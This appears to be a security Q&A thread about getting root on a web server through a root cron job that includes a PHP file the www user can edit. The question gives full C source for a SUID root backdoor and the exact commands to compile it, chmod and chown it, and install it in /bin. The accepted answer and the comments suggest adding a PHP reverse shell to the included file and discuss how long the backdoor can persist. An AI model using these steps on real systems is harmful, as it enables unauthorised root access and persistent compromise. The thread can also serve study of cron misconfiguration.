# Exploiting cron job running as root

Tags: linux, exploit, privilege-escalation

There is a cron job running as `root` on a web server every 15 minutes:

`php cli-script.php`

(*cli* stands for "**C**ommand **L**ine **I**nterface", so is only accessible from command-line)

It is not possible to directly modify the PHP script `cli-script.php`. Hower it includes another PHP script `db.php` which can be directly modifed as `www` user:

*cli-script.php*:

```
include "db.php";
...
```

---

My exploitation technique:

1. Modify `db.php` - add `system()` command since `db.php` inherits `root's` privileges from cron job's script, but can be edited as `www`-user (`db.php` is **W**ritable, **R**eadable and **E**xecutable as `www` user). Run all initial commands through `system()`
2. Create binary wrapper `backdoor` for easier further exploitation. We need to set *UID* to zero (`root`) to be able to use shells like `bash`/`sh` ([SUID not used after exploit](https://security.stackexchange.com/questions/174170/suid-not-used-after-exploit)) (another way would be to use e.g. *perl/python* scripts)

*db.php*

```
...
system("...");
...
```

*backdoor.c*:

```
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>

int main(int argc, char *argv[]) {
    if (argc == 2) {
        setuid(0); // otherwise /bin/sh would use real UID
        system(argv[1]);
    } else {
        printf("1 argument expected");
    }
    return 0;
}
```

Detailed steps:

1. Compile C-code as `www`-user: `gcc backdoor.c -o backdoor`
2. Put sticky bit + change file owner as `root`: `chmod +s backdoor && chown root backdoor`
3. Put binary into `/bin/` directory as `root`: `mv backdoor /bin/backdoor`
4. Usage (execute as `www`-user): `backdoor "whoami"` => `root`

---

**Question:** Is there any simpler way to exploit such vulnerability and I'm just overcomplicating everything?

Comment: Then I guess I misunderstood.  In that case the answer is simple: no, there really isn't anything simpler.  Other than @gowenfawr's answer, which is what I would do - drop in a reverse shell.  Otherwise though there really isn't anywhere to cut any corners.  You can't modify cron, you can't edit the `cli-script.php`.  Editing the file it includes which you do have access to is the only option.

Comment: @Conor Mancone yes, that makes sense. so i will accept gowenfawr answer. but i think that such binary wrapper is more persistent rather than php reverse shell which was loaded into memory. it's about quality of a backdoor.

Comment: That's a bit of a different question.  You asked about exploiting a cron job.  Dropping in a shell is the best way to go.  If you're interested in persistence then neither your backdoor nor gowenfawr's answer is ideal, because neither give you a way to get back in once kicked out.  However, either method would then allow you to drop in an actual hidden backdoor.

Answer (score 4, accepted):

> Is there any simpler way to exploit such vulnerability

It would be more straightforward to simply integrate a [PHP reverse shell](http://pentestmonkey.net/tools/web-shells/php-reverse-shell) into the db.php file; once it runs and connects to your listener, you'll be given shell-like access as `root`.